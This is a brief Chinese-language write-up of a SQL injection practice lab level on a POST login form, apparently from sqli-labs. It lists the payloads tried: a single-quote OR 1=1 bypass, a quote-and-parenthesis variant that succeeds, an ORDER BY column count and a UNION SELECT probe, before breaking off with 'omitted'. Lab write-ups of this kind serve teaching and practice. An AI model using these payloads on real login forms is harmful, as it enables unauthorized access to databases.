题目:POST - Double Injection - Single quotes- String - with twist
单引号与括号的双注入
先试试
uname=1' or 1=1#&passwd=1&submit=Submit
有报错,但不返回数据库查询的信息了
尝试
uname=1')or 1=1#&passwd=1&submit=Submit
成功
查字符段
uname=1')or 1=1 order by 3#&passwd=1&submit=Submit
查可回显字符段
uname=1')and 1=1 union select 1,2,3#&passwd=1&submit=Submit
略